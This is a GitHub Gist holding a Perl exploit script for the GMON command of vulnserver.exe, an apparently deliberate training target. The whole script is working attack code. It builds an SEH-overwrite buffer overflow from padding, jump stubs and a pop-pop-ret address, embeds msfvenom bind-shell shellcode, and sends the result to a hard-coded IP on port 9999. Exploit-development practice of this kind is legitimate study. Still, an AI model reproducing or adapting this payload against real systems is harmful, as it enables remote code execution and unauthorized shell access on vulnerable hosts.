Created
January 30, 2020 17:04
-
-
Save 0xbadjuju/cf96c2eb3a7435ca8eb7996024beb7bb to your computer and use it in GitHub Desktop.
vulnserver.exe GMON
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| use strict; | |
| use warnings; | |
| use Encode qw/encode/; | |
| use Socket; | |
| my $target = inet_aton("192.168.99.144"); | |
| my $port = 9999; | |
| my $portaddr = sockaddr_in($port, $target); | |
| my $header = "GMON /.:/"; | |
| #SEH chain of thread 000041A8, item 0 | |
| # Address=00FBFFDC | |
| # SE handler=45336E45 | |
| #[*] Exact match at offset 3519 | |
| my $padding1 = "A" x 2914; | |
| #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00" -f perl | |
| #355 bytes | |
| my $payload = | |
| "\xda\xd5\xbd\xd4\x17\x90\x69\xd9\x74\x24\xf4\x5a\x31\xc9" . | |
| "\xb1\x53\x83\xc2\x04\x31\x6a\x13\x03\xbe\x04\x72\x9c\xc2" . | |
| "\xc3\xf0\x5f\x3a\x14\x95\xd6\xdf\x25\x95\x8d\x94\x16\x25" . | |
| "\xc5\xf8\x9a\xce\x8b\xe8\x29\xa2\x03\x1f\x99\x09\x72\x2e" . | |
| "\x1a\x21\x46\x31\x98\x38\x9b\x91\xa1\xf2\xee\xd0\xe6\xef" . | |
| "\x03\x80\xbf\x64\xb1\x34\xcb\x31\x0a\xbf\x87\xd4\x0a\x5c" . | |
| "\x5f\xd6\x3b\xf3\xeb\x81\x9b\xf2\x38\xba\x95\xec\x5d\x87" . | |
| "\x6c\x87\x96\x73\x6f\x41\xe7\x7c\xdc\xac\xc7\x8e\x1c\xe9" . | |
| "\xe0\x70\x6b\x03\x13\x0c\x6c\xd0\x69\xca\xf9\xc2\xca\x99" . | |
| "\x5a\x2e\xea\x4e\x3c\xa5\xe0\x3b\x4a\xe1\xe4\xba\x9f\x9a" . | |
| "\x11\x36\x1e\x4c\x90\x0c\x05\x48\xf8\xd7\x24\xc9\xa4\xb6" . | |
| "\x59\x09\x07\x66\xfc\x42\xaa\x73\x8d\x09\xa3\xb0\xbc\xb1" . | |
| "\x33\xdf\xb7\xc2\x01\x40\x6c\x4c\x2a\x09\xaa\x8b\x4d\x20" . | |
| "\x0a\x03\xb0\xcb\x6b\x0a\x77\x9f\x3b\x24\x5e\xa0\xd7\xb4" . | |
| "\x5f\x75\x4d\xbc\xc6\x26\x70\x41\xb8\x96\x34\xe9\x51\xfd" . | |
| "\xba\xd6\x42\xfe\x10\x7f\xea\x03\x9b\x6e\xb7\x8a\x7d\xfa" . | |
| "\x57\xdb\xd6\x92\x95\x38\xef\x05\xe5\x6a\x47\xa1\xae\x7c" . | |
| "\x50\xce\x2e\xab\xf6\x58\xa5\xb8\xc2\x79\xba\x94\x62\xee" . | |
| "\x2d\x62\xe3\x5d\xcf\x73\x2e\x35\x6c\xe1\xb5\xc5\xfb\x1a" . | |
| "\x62\x92\xac\xed\x7b\x76\x41\x57\xd2\x64\x98\x01\x1d\x2c" . | |
| "\x47\xf2\xa0\xad\x0a\x4e\x87\xbd\xd2\x4f\x83\xe9\x8a\x19" . | |
| "\x5d\x47\x6d\xf0\x2f\x31\x27\xaf\xf9\xd5\xbe\x83\x39\xa3" . | |
| "\xbe\xc9\xcf\x4b\x0e\xa4\x89\x74\xbf\x20\x1e\x0d\xdd\xd0" . | |
| "\xe1\xc4\x65\xe0\xab\x44\xcf\x69\x72\x1d\x4d\xf4\x85\xc8" . | |
| "\x92\x01\x06\xf8\x6a\xf6\x16\x89\x6f\xb2\x90\x62\x02\xab" . | |
| "\x74\x84\xb1\xcc\x5c"; | |
| my $padding3 = "D" x 120; | |
| #JMP -517 | |
| #cat jmpfile.bin | msfvenom -a x86 --platform windows -f perl -b "\x00" | |
| my $jmplong = | |
| "\xb8\x31\x08\xfb\x31\xda\xc3\xd9\x74\x24\xf4\x5b\x31\xc9" . | |
| "\xb1\x05\x31\x43\x13\x83\xeb\xfc\x03\x43\x3e\xea\x0e\xe8" . | |
| "\xae\x33\x84\x2f\xda\x9d\xe5\xf1\x28\x8e\x18\x3c\xd2\x63" . | |
| "\x1b\x5e" . | |
| "C" x 82; | |
| #JMP -125 | |
| my $jmpshort = "\xeb\x80\x42\x42"; | |
| #0x625010b4 pop ebx; pop ebp; ret | |
| #SEH chain of thread 000048C0, item 0 | |
| # Address=00F3FFDC | |
| # SE handler=essfunc.625010B4 | |
| my $seh = "\xb4\x10\x50\x62"; | |
| my $padding2 = "C" x 473; | |
| my $message = $header . $padding1 . $payload . $padding3 . $jmplong . $jmpshort . $seh . $padding2; | |
| print $message . "\r\n"; | |
| socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp')) | |
| or die "Can't create a socket $!\n"; | |
| connect(SOCKET , $portaddr) | |
| or die "Unable to connect to socket $!\n"; | |
| send(SOCKET, $message, 0) == length($message) | |
| or die "cannot send to $target($port): $!"; | |
| close SOCKET or die "close: $!"; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment